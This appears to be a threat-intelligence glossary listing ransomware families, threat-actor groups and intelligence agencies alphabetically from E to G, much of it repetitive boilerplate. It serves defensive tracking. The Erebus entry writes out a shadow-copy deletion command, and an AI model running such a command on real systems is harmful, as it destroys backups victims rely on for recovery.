EncoderCSL
Ransomware
EnCrypt
Ransomware
EncryptedBatch
Ransomware
EncrypTile Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
encryptoJJS
Ransomware
EncryptServer2018
Ransomware
Encryptss77 Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Endurance
Endurance is a destructive ransomware variant first observed in 2023, developed and operated by the threat actor known as IntelBroker (also referred to as Butler Spider). Rather than encrypting files for decryption, it functions primarily as a data wiper, overwriting file contents, appending randomized filenames, and then deleting the files altogether. The source code for the malware was intentionally made public by the operator, indicating its use as both a tool and a statement. Endurance was used in high-profile breaches, including targeting government agencies, large enterprises, and telecommunications providers.
ENERGETIC BEAR
A Russian group that collects intelligence on the energy industry.
Enforcement Directorate
Enforcement Directorate
Enigma 2 Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Enigma
Ransomware
Enjey
Ransomware Based on RemindMe
EnjeyCrypter Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
EnkripsiPC Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The name of the hacker is humanpuff69 and he requests 0.5 bitcoins. The encryption password is based on the computer name
Ensiko
ransomware
Entropy
Entropy is a ransomware first seen in 1st quarter of 2022, is being used in conjunction of Dridex infection. The ransomware uses a custom packer to pack itself which has been seen in some early dridex samples.
ENVOY PANDA
ENVOY PANDA is a "China-nexus" actor, active since 2011, that has mainly targeted diplomatic entities associated with African and Middle Eastern governments.[[CrowdStrike 2025 Global Threat Report](/references/a69b0ce3-f314-4b32-bfb3-b1380c4f0ec4)][[Envoy Panda Profile](/references/44879a86-9eda-4934-bfc4-cbc643ab113a)]
EnyBeny Nuclear Ransomware
@GrujaRS discovered a new in-dev ransomware called EnyBeny Nuclear Ransomware that meant to append the extension .PERSONAL_ID:.Nuclear to encrypted files, but failed due to a bug.
EnybenyCrypt
Ransomware
EnyBenyHorsuke Ransomware
GrujaRS discovered a new ransomware called EnyBenyHorsuke Ransomware that appends the .Horsuke extension to encrypted files.
EOEO
Ransomware
ep918
ep918 is an active extortion or ransomware group tracked by RansomLook.
EPICALLY
ransomware
Epoblockl
Ransomware
Epsilon
ransomware
EQ Ransomware
GrujaRS discovered the EQ Ransomware that drops a ransom note named README_BACK_FILES.htm and uses .f**k (censored) as its extension for encrypted files. May be GlobeImposter.
Equation Group
The Equation Group is a highly sophisticated threat actor described by its discoverers at Kaspersky Labs as one of the most sophisticated cyber attack groups in the world, operating alongside but always from a position of superiority with the creators of Stuxnet and Flame
Eraleign apt73
Eraleign apt73 is an active extortion or ransomware group tracked by RansomLook.
Erebus 2017 Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
Erebus Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. After the files are decrypted, the shadow files are deleted using the following command: vssadmin.exe Delete Shadows /All /Quiet
Erica2020
Ransomware
Eris
Ransomware
eruption
Rebranded to Sabbath.
es:Secretaría de Inteligencia Estratégica de Estado
State Secretariat of Strategic Intelligence - Secretaría de Inteligencia Estratégica de Estado (SIEE)
Esmeralda Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Estado Mayor Presidencial
2nd Section of the National Defense Intelligence Staff (SEDENA S-2 – Seccion 2da: Inteligencia del Estado Mayor)
Estemani
Ransomware
Estonian Foreign Intelligence Service
Estonian Foreign Intelligence Service (VLA) (Välisluureamet)
Estonian Internal Security Service
Estonian Internal Security Service (KaPo) (Kaitsepolitseiamet)
Eternal
Ransomware
Eternity
Ransomware
Etterretningstjenesten
Etterretningstjenesten (NIS) (Norwegian Intelligence Service)
Euclid
Ransomware
European Union Military Staff
European Union Military Staff (EUMS)
European Union Satellite Centre
European Union Satellite Centre (EU SatCen)
Evasive HT
Ransomware
Evasive Panda
Evasive Panda is an APT group that has been active since at least 2012, conducting cyberespionage targeting individuals, government institutions and organizations.
Everest Ransomware Actors
Threat actors known to deploy Everest, a ransomware strain that researchers have linked to both the previous Everbe 2.0 and BlackByte ransomware families.[[NCC Group Everest Ransomware July 13 2022](/references/33effb32-5c39-4bde-953d-12dc7be4db07)]
Everest
Everest is a ransomware group active since at least December 2020, known for its double-extortion tactics. The group initially operated as a typical ransomware outfit, encrypting files with strong cryptography and appending victim-specific extensions, but later shifted toward pure data extortion—threatening to sell or release stolen data without necessarily deploying encryption. Everest targets a wide range of sectors, including government, healthcare, manufacturing, and IT services, with confirmed victims in North America, Europe, and Asia. Initial access vectors include exploitation of vulnerable public-facing applications, phishing campaigns, and credential theft for remote access services. The group maintains a Tor-based leak site to publish stolen information and advertise access to compromised networks.
Evil Corp
Evil Corp is an internaltional cybercrime network. In December of 2019 the US Federal Government offered a $5M bounty for information leading to the arrest and conviction of Maksim V. Yakubets for allegedly orchestrating Evil Corp operations. Responsible for stealing over $100M from businesses and consumers. The Evil Corp organization is known for utilizing custom strains of malware such as JabberZeus, Bugat and Dridex to steal banking credentials.
Evil Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Domain KZ is used, therefore it is assumed that the decrypter is from Kazakhstan. Coded in Javascript
Evilbyte
EvilByte is a hacktivist group that has conducted several high-profile cyber attacks in 2024, including breaching MyFatoorah's banking system in retaliation against Saudi media 1 and targeting Radio 10 Rosario in Argentina 2. The group has also claimed responsibility for breaching Israeli government websites and leaking data of government employees and intelligence agencies 4.
EvilPost
EvilPost is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
EvilTraffic
Malware experts at CSE Cybsec uncovered a massive malvertising campaign dubbed EvilTraffic leveraging tens of thousands compromised websites. Crooks exploited some CMS vulnerabilities to upload and execute arbitrary PHP pages used to generate revenues via advertising.
EvilWeb
EvilWeb is a pro-Russian hacktivist group created in March 2024 that targets American and European entities using a hack-and-leak method alongside DDoS attacks. The group claims to have obtained data from various high-profile American organizations. EvilWeb announced its participation in the #FreeDurov operation on August 25, 2024, and began executing DDoS and hacking attacks. As of September 3, 2024, their Telegram channel has 1,146 members.
Evolution
Ransomware
ExCobalt
ExCobalt is an APT group that has been active since at least 2016 and is believed to be linked to the notorious Cobalt Gang. The group primarily targets Russian organizations across sectors—including metallurgy, telecommunications, mining, information technology, government, and software development by exploiting supply chain weaknesses and compromised contractors for initial access. ExCobalt’s toolkit features a custom Golang‑based backdoor, GoRed, which enables remote command execution, credential harvesting, and detailed system reconnaissance, while the group also employs established tools such as Spark RAT, Mimikatz, and multiple Linux privilege escalation exploits. Researchers note that ExCobalt continually evolves its tactics and even modifies standard utilities to bypass security controls and maintain persistent access, underscoring its commitment to sophisticated cyberespionage and data theft operations.
Executioner
Ransomware
ExecutionerPlus
Ransomware
Exerwa CTF
ransomware
Exitium
Exitium is an active extortion or ransomware group tracked by RansomLook.
Exocrypt XTC
Ransomware
ExoLock
Ransomware
Exorcist
ransomware
Exotic Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Also encrypts executables
ExpBoot
Ransomware
Explorer
Ransomware
Extortion Scam
Ransomware
Extractor
Ransomware
Eyecry
ransomware
EyLamo
Ransomware
EZDZ
Ransomware
Fabiansomware
Ransomware
FabSysCrypto Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Based on HiddenTear
Facebook HT
Ransomware
Fadesoft Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is 0.33 bitcoins.
Fail0verflow
Fail0verflow is a hacking group known for exploiting vulnerabilities in gaming consoles, notably the Nintendo Wii and PlayStation 3. They utilized techniques such as RAM shorting, buffer overflow, and a signing bug to achieve code execution and develop the Homebrew Channel for the Wii. In 2010, they compromised an ECDSA key for the PS3, and later announced the retrieval of PS5 symmetric root keys, enabling the potential for custom firmware and homebrew software. Their exploits often involve kernel access and have raised concerns about the implications for piracy and litigation in the gaming community.
Fairware
Ransomware Target Linux O.S.
Faizal
Ransomware
Fakben
Ransomware Based on Hidden Tear
Fake Cerber
Ransomware
Fake DMA
ransomware
Fake Globe Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… The ransom is 1bitcoin.
Fake Locky Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
FakeCryptoLocker
Ransomware
Fakersa
Fakersa is an active extortion or ransomware group tracked by RansomLook.
Falcons Intelligence Cell
Falcons Intelligence Cell - (FIC) - (Military intelligence)
Fantom
Ransomware Based on EDA2
Farattack
Farattack is an active extortion or ransomware group tracked by RansomLook.
fargo
Fargo is a ransomware variant that surfaced in 2022, primarily targeting Microsoft SQL Server (MSSQL) systems. Believed to be a variant of the TargetCompany ransomware family, Fargo uses brute-force or credential-stuffing attacks on exposed MSSQL instances to gain access, then executes payloads via SQL Server commands. Once deployed, it encrypts files using a combination of symmetric and asymmetric algorithms, appends the .Fargo3 (or similar) extension, and drops a ransom note directing victims to contact operators via email. It also attempts to delete system backups and shadow copies to prevent recovery. Fargo has been observed targeting organizations in multiple sectors, with a concentration of victims in South Korea and other parts of Asia.
FartPlz
ransomware
FASTCash
Treasury has identified a sophisticated cyber-enabled ATM cash out campaign we are calling FASTCash. FASTCash has been active since late 2016 targeting banks in Africa and Asia to remotely compromise payment switch application servers within banks to facilitate fraudulent transactions, primarily involving ATMs, to steal cash equivalent to tens of millions of dollars. FBI has attributed malware used in this campaign to the North Korean government. We expect FASTCash to continue targeting retail payment systems vulnerable to remote exploitation.
Fastwind
ransomware
faust
Faust is a variant of the well-known Phobos ransomware, part of a Ransomware-as-a-Service (RaaS) ecosystem active since around May 2019. Faust employs a double-extortion model, encrypting victim files and threatening to release stolen data if ransom demands are not met. It's distributed via Office document payloads using VBA scripts and known for its fileless attack delivery, enabling stealth and evasion.
FBI Intelligence Branch
FBI Intelligence Branch (IB)
FBLocker
ransomware
FCP
ransomware
FCrypt
ransomware
FCT
ransomware
Federal Investigation Agency
Federal Investigation Agency (FIA)
Federal Office for Information Security
Bundesamt für Sicherheit in der Informationstechnik (BSI): Federal Office for Information Security
Federal Police Department
Federal Police Department (DPF) (counterintelligence agency)
Federal Police (Mexico)
Intelligence Division of the Federal Police (Division de Inteligencia – CNS / Policia Federal)
Federal Security Service (Russia)
Federal Security Service (FSB) – Федеральная служба безопасности
Femwar02
Femwar02 is a previously unknown pro-Russian ransomware threat actor that emerged in early 2026, linked to a major cyberattack on Italy's Sapienza University of Rome in February 2026, which caused a full network shutdown and operational disruptions. The group deploys Bablock (also known as Rorschach), a next-generation ransomware strain first identified in 2023 that features fast hybrid encryption (curve25519 and hc-128), partial file encryption for speed, direct system calls to evade detection, and domain-wide propagation via Group Policy on Windows Domain Controllers. Bablock shares code similarities with LockBit 2.0 but incorporates elements from other families like Babuk and DarkSide, often delivered via encrypted payloads, DLL sideloading with tools like DarkLoader, and exploits such as those in Zimbra or phishing. Notably, the malware skips encrypting files written in Russian, reinforcing its pro-Russian alignment, with no prior attributions or campaigns documented before the Sapienza incident.
FenixLocker
Ransomware
Fenrir
ransomware
FILE FROZR
Ransomware RaaS
File Ripper
ransomware
File Spider
A new ransomware called File Spider is being distributed through spam that targets victims in Bosnia and Herzegovina, Serbia, and Croatia. These spam emails contains malicious Word documents that will download and install the File Spider ransomware onto a victims computer.File Spider is currently being distributed through malspam that appears to be targeting countries such as Croatia, Bosnia and Herzegovina, and Serbia. The spam start with subjects like"Potrazivanje dugovanja", which translates to "Debt Collection" and whose message, according to Google Translate, appear to be in Serbian.
FileCoder
A barely functional piece of macOS ransomware, written in Swift.
FileEngineering
ransomware
FileFuck
ransomware
Fileice Ransomware Survey Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Sample of how the hacker tricks the user using the survey method. https://1.bp.blogspot.com/-72ECd1vsUdE/WBMSzPQEgzI/AAAAAAAABzA/i8V-Kg8Gstcn_7-YZK__PDC2VgafWcfDgCLcB/s1600/survey-screen.png The hacker definatly has a sense of humor: https://1.bp.blogspot.com/-2AlvtcvdyUY/WBMVptG_V5I/AAAAAAAABzc/1KvAMeDmY2w9BN9vkqZO8LWkBu7T9mvDACLcB/s1600/ThxForYurTyme.JPG
FileLocker
The File-Locker Ransomware is a Hidden Tear variant that is targeting victims in Korea. When victim's are infected it will leave a ransom requesting 50,000 Won, or approximately 50 USD, to get the files back. This ransomware uses AES encryption with a static password of "dnwls07193147", so it is easily decryptable.
FilesL0cker
ransomware
FIN1
FireEye first identified this activity during a recent investigation at an organization in the financial industry. They identified the presence of a financially motivated threat group that they track as FIN1, whose activity at the organization dated back several years. The threat group deployed numerous malicious files and utilities, all of which were part of a malware ecosystem referred to as ‘Nemesis’ by the malware developer(s), and used this malware to access the victim environment and steal cardholder data. FIN1, which may be located in Russia or a Russian-speaking country based on language settings in many of their custom tools, is known for stealing data that is easily monetized from financial services organizations such as banks, credit unions, ATM operations, and financial transaction processing and financial business services companies.
FIN11
FIN11 is a well-established financial crime group that has recently focused its operations on ransomware and extortion. The group has been active since 2017 and has been tracked under UNC902 and later on as TEMP.Warlok. In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity.(FireEye) Mandiant has also responded to numerous FIN11 intrusions, but we’ve only observed the group successfully monetize access in few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion. Notably, FIN11 includes a subset of the activity security researchers call TA505, Graceful Spider, Gold Evergreen, but we do not attribute TA505’s early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.
FIN7
FIN7 is a financially-motivated threat group that has been active since 2013. FIN7 has targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, pharmaceutical, and utilities industries in the United States. A portion of FIN7 was operated out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, FIN7 shifted operations to big game hunting (BGH), including use of REvil ransomware and their own Ransomware-as-a-Service (RaaS), Darkside. FIN7 may be linked to the Carbanak Group, but multiple threat groups have been observed using Carbanak, leading these groups to be tracked separately. [FireEye FIN7 March 2017](https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html) [FireEye FIN7 April 2017](https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html) [FireEye CARBANAK June 2017](https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html) [FireEye FIN7 Aug 2018](https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html) [CrowdStrike Carbon Spider August 2021](https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/) [Mandiant FIN7 Apr 2022](https://www.mandiant.com/resources/evolution-of-fin7) [BiZone Lizar May 2021](https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319)
Final
ransomware
Financial Crimes Investigation Division
Financial Crimes Investigation Division
Financial Intelligence Division (FID)
Financial Intelligence Division (FID)
Financial Intelligence Unit (Bahamas)
Financial Intelligence Unit (FIU)
Financial Intelligence Unit (Barbados)
Financial Intelligence Unit (FIU)
Financial Intelligence Unit (Sri Lanka),
Financial Intelligence Unit (Sri Lanka),
Financial Intelligence Unit Trinidad and Tobago (FIUTT)[31]
Financial Intelligence Unit Trinidad and Tobago (FIUTT)[31]
Financial Investigations Division (FID)[14]
Financial Investigations Division (FID)[14]
Financial Monitoring Service (Azerbaijan)
Financial Monitoring Service (Maliyyə Monitorinqi Xidməti)
Financial Monitoring Unit
Financial Monitoring Unit (FMU)
Financial Transactions and Reports Analysis Centre of Canada
Financial Transactions and Reports Analysis Centre of Canada (FINTRAC)
FindZip
ransomware
Finnish Defence Intelligence Agency
Finnish Defence Intelligence Agency – Puolustusvoimien tiedustelulaitos (PVTIEDL) / Försvarsmaktens underrättelsetjänst
Finnish Security Intelligence Service
Finnish Security Intelligence Service (SUPO) – Suojelupoliisi / Skyddspolisen
FireCrypt
Ransomware
First
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
Fishing Elephant
Fishing Elephant is a threat actor that primarily targets victims in Bangladesh and Pakistan. They rely on consistent TTPs, including payload and communication patterns, while occasionally incorporating new techniques such as geo-fencing and hiding executables within certificate files. Their tool of choice is AresRAT, which they deliver through platforms like Heroku and Dropbox. Recently, they have shifted their focus to government and diplomatic entities in Turkey, Pakistan, Bangladesh, Ukraine, and China.
FishMedley
Verticals targeted during Operation FishMedley include governments, NGOs, and think tanks, across Asia, Europe, and the United States. ; Operators used implants – such as ShadowPad, SodaMaster, and Spyder – that are common or exclusive to China-aligned threat actors. ; We assess with high confidence that Operation FishMedley was conducted by the FishMonger APT group.
Flamingo
ransomware
Flash Kitten
This suspected Iran-based adversary conducted long-running SWC campaigns from December 2016 until public disclosure in July 2018. Like other Iran-based actors, the target scope for FLASH KITTEN appears to be focused on the MENA region.
Flatcher3
ransomware
FlatChestWare
HiddenTear variant; decryptable
Flax Typhoon
Flax Typhoon is a Chinese state-sponsored threat actor that primarily targets organizations in Taiwan. They conduct espionage campaigns and focus on gaining and maintaining long-term access to networks using minimal malware. Flax Typhoon relies on tools built into the operating system and legitimate software to remain undetected. They exploit vulnerabilities in public-facing servers, use living-off-the-land techniques, and deploy a VPN connection to maintain persistence and move laterally within compromised networks.
Fletchen
Fletchen is an active extortion or ransomware group tracked by RansomLook.
FLKR Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
FlowEncrypt
ransomware
FlowerStorm
FlowerStorm is a phishing-as-a-service platform that mimics legitimate services to bypass multi-factor authentication structure. The majority of its targets are located in North America and Europe, with a significant focus on organizations in the United States. FlowerStorm's operational mistakes have led to vulnerabilities that can be exploited for disruption and analysis.
Fluffy-TAR
ransomware
Flying Kitten
Activity: defense and aerospace sectors, also interested in targeting entities in the oil/gas industry.
FlyingYeti
FlyingYeti is a Russia-aligned threat actor targeting Ukrainian military entities. They conduct reconnaissance activities and launch phishing campaigns using malware like COOKBOX. FlyingYeti exploits the WinRAR vulnerability CVE-2023-38831 to infect targets with malicious payloads. Cloudforce One has successfully disrupted their operations and provided recommendations for defense against their phishing campaigns.
Flyper
Ransomware Based on EDA2 / HiddenTear
Fog
Fog is a sophisticated ransomware strain first observed in April–May 2024, initially targeting U.S. educational institutions before expanding into sectors such as government, business services, finance, and manufacturing. The group conducts fast, double-extortion attacks: they exploit compromised VPN credentials or known vulnerabilities, deploy encryption (notably using extensions like .fog, .FLOCKED), and exfiltrate data prior to encryption to maximize victim pressure. Fog is associated with other prolific actors—such as Akira and Conti—through shared tooling, infrastructure timelines, and even cryptocurrency wallets.
Fonco
Ransomware contact email safefiles32@mail.ru also as prefix in encrypted file contents
FonixCrypter
ransomware
Foreign Intelligence Service (Azerbaijan)
Foreign Intelligence Service (Xarici Kəşfiyyat Xidməti)
Foreign Intelligence Service of Ukraine
Foreign Intelligence Service of Ukraine – Sluzhba Zovnishnioyi Rozvidky Ukrayiny (SZR or SZRU)
Foreign Intelligence Service (Romania)
Foreign Intelligence Service (SIE) – Serviciul de Informații Externe
Foreign Intelligence Service (Russia)
Foreign Intelligence Service (Russia) (SVR) – Служба Внешней Разведки
Forsvarets sikkerhetstjeneste
Forsvarets sikkerhetstjeneste (FOST) – Norwegian Defence Security Service (NORDSS)
FortuneCookie
Ransomware
FOXY PANDA
Adversary group targeting telecommunication and technology organizations.
Foxy
ransomware
Frag
Frag is a relatively new ransomware and data extortion group first seen in February 2025. The group operates a dedicated Tor-based leak site where it publishes victim details, including sector, location, and sample stolen files, as part of its double-extortion strategy. Within its first month of activity, Frag claimed over two dozen victims, spanning industries such as manufacturing, aviation, real estate, retail, and legal services, with a global footprint including the United States, the Netherlands, and Singapore. Intrusion methods have included exploitation of known vulnerabilities—such as the Veeam Backup & Replication flaw CVE-2024-40711—and compromised remote access appliances. The group’s operations and targeting style suggest experienced actors, possibly with past involvement in other ransomware projects.
Free-Freedom
Ransomware Unlock code is: adam or adamdude9
Freecivilian
Freecivilian is an active extortion or ransomware group tracked by RansomLook.
Freeme
Freezing crypto ransomware encrypts user data using AES, and then requires a ransom in # BTC to return the files. Original title: not indicated in the note. The file says: FreeMe.exe
freeworld
FreeWorld is a ransomware variant first observed in September 2023, and is believed to be derived from the Mimic ransomware family. It is deployed through coordinated campaigns dubbed DB#JAMMER, which exploit poorly secured Microsoft SQL (MSSQL) servers exposed to the internet. Attackers gain initial access via brute force, leverage the xp_cmdshell feature to execute shell commands, disable defenses, deploy remote access tools like Cobalt Strike and AnyDesk, and eventually deliver the FreeWorld payload. The ransomware encrypts files using hybrid encryption and appends the .FreeWorldEncryption extension. Victims receive a ransom note titled FreeWorld-Contact.txt, directing them on payment and data recovery steps.
Freshdesk
ransomware
Frog
ransomware
FrostyNeighbor
FrostyNeighbor is a Belarus-aligned APT group known for conducting influence and disinformation campaigns, particularly targeting Ukraine, Poland, and Lithuania. They have compromised various governmental and private sector entities, including the Polish Anti-Doping Agency, through hack-and-leak operations. The group is believed to collaborate with initial access brokers to exploit high-value targets, utilizing techniques such as zero-day vulnerabilities. Their operations are linked to cyber-enabled disinformation campaigns critical of the North Atlantic Alliance.
Frozen
Frozen is an active extortion or ransomware group tracked by RansomLook.
FrozrLock
ransomware
FRS
ransomware
Fs0ciety Locker Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
FScrypt
ransomware
FSociety
Ransomware Based on EDA2 and RemindMe
Fsteam
Fsteam is an active extortion or ransomware group tracked by RansomLook.
FTCode
A targeted email campaign has been spotted distributing the JasperLoader to victims. While the JasperLoader was originally used to then install Gootkit, Certego has observed it now being used to infect victims with a new ransomware dubbed FTCODE. Using an invoice-themed email appearing to target Italian users, the attackers attempt to convince users to allow macros in a Word document. The macro is used to run PowerShell to retrieve additional PowerShell code.
FuckSociety Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Hidden Tear >> APT Ransomware + HYPERLINK "https://id-ransomware.blogspot.ru/2016/05/remindme-ransomware-2.html" "_blank" RemindMe > FuckSociety
FuckTheSystem
ransomware
Fulcrumsec
Fulcrumsec is an active extortion or ransomware group tracked by RansomLook.
FunFact Ransomware
Funfact uses an open code for GNU Privacy Guard (GnuPG), then asks to email them to find out the amout of bitcoin to send (to receive a decrypt code). Written in English, can attach all over the world. The ransom is 1.22038 BTC, which is 1100USD.
FunkSec
Funksec is a newly identified extortion group that has claimed 11 victims across various sectors, including media, IT, and education, operating a Tor-based DLS to centralize its ransomware activities. The group advertises a free DDoS tool and may develop its own ransomware binary, indicating significant technical capability. The DLS was likely created in late November to early December 2024, with the first advertisement titled “Funksec Ransomware” posted on 3 December 2024. Currently, there is limited publicly available information on Funksec's TTPs, and it is not known to be associated with any other threat groups.
Fury
Ransomware
Fusion
Fusion is an active extortion or ransomware group tracked by RansomLook.
FusionCore
The CYFIRMA research team has identified a new up-and-coming European threat actor group known as FusionCore. Running Malware-as-a-service, along with the hacker-for- hire operation, they have a wide variety of tools and services that are being offered on their website, making it a one-stop-shop for threat actors looking to purchase cost- effective yet customizable malware. The operators have started a ransomware affiliate program that equips the attackers with the ransomware and affiliate software to manage victims. FusionCore typically provides sellers with a detailed set of instructions for any service or product being sold, enabling individuals with minimal experience to carry out complex attacks.
Fusob
Fusob is one of the major mobile ransomware families. Between April 2015 and March 2016, about 56 percent of accounted mobile ransomware was Fusob. Like a typical mobile ransomware, it employs scare tactics to extort people to pay a ransom. The program pretends to be an accusatory authority, demanding the victim to pay a fine from $100 to $200 USD or otherwise face a fictitious charge. Rather surprisingly, Fusob suggests using iTunes gift cards for payment. Also, a timer clicking down on the screen adds to the users’ anxiety as well. In order to infect devices, Fusob masquerades as a pornographic video player. Thus, victims, thinking it is harmless, unwittingly download Fusob. When Fusob is installed, it first checks the language used in the device. If it uses Russian or certain Eastern European languages, Fusob does nothing. Otherwise, it proceeds on to lock the device and demand ransom. Among victims, about 40% of them are in Germany with the United Kingdom and the United States following with 14.5% and 11.4% respectively. Fusob has lots in common with Small, which is another major family of mobile ransomware. They represented over 93% of mobile ransomwares between 2015 and 2016.
FuxSocy Encryptor
ransomware
Fxmsp
Throughout 2017 and 2018, Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground. Some of the known Fxmsp TTPs included accessing network environments via externally available remote desktop protocol (RDP) servers and exposed active directory. Most recently, the actor claimed to have developed a credential-stealing botnet capable of infecting high-profile targets in order to exfiltrate sensitive usernames and passwords. Fxmsp has claimed that developing this botnet and improving its capabilities for stealing information from secured systems is their main goal.
Galacti-Crypter
ransomware
GamaCopy
GamaCopy is a threat actor first discovered in June 2023, known for launching cyberattacks against Russia’s defense and critical infrastructure sectors by mimicking the TTPs of Gamaredon. The organization has been active since at least August 2021 and primarily uses Russian-language bait documents related to military facilities. Analysis of attack samples shows considerable overlap in code structure and tactics, including the use of 7z-SFX documentation to install UltraVNC and connecting via port 443. GamaCopy employs open-source tools to obfuscate its activities while targeting sensitive information in the context of the Russia-Ukraine conflict.
GambleForce
GambleForce is a threat actor specializing in SQL injection attacks. They have targeted over 20 websites in various sectors across multiple countries, compromising six companies. GambleForce utilizes publicly available pentesting tools and has been active since mid-September 2023.
GameOver
ransomware
GammA
ransomware
GandCrab
A new ransomware called GandCrab was released towards the end of last week that is currently being distributed via exploit kits. GandCrab has some interesting features not seen before in a ransomware, such as being the first to accept the DASH currency and the first to utilize the Namecoin powered .BIT tld.
Gangbang
Gangbang is an active extortion or ransomware group tracked by RansomLook.
Gangmasters and Labour Abuse Authority
Gangmasters and Labour Abuse Authority - Human trafficking, slavery, economic, and serious organised crime.
Garda National Surveillance Unit
National Surveillance Unit (NSU)
garrantydecrypt
Michael Gillespie found a new ransomware that appends the .garrantydecrypt extension and drops a ransom note named #RECOVERY_FILES#.txt
GarryWeber Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. Its original name is FileSpy and FileSpy Application. It is spread using email spam, fake updates, infected attachments and so on. It encryps all your files, including: music, MS Office, etc..
Gazprom
Gazprom is an active extortion or ransomware group tracked by RansomLook.
GC01
From November 2017 to October 2018, we attributed 14 campaigns to the GC threat actors that used a specific MaaS provider (hereinafter “the Provider”) offered by a known individual (hereinafter “the Provider Operator”).
GC02
From November 2017 to October 2018, we attributed 14 campaigns to the GC threat actors that used a specific MaaS provider (hereinafter “the Provider”) offered by a known individual (hereinafter “the Provider Operator”).
GC47 Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
gd lockersec
Our team members are from different countries and we are not interested in anything else, we are only interested in dollars.
We do not allow CIS, Cuba, North Korea and China to be targeted.
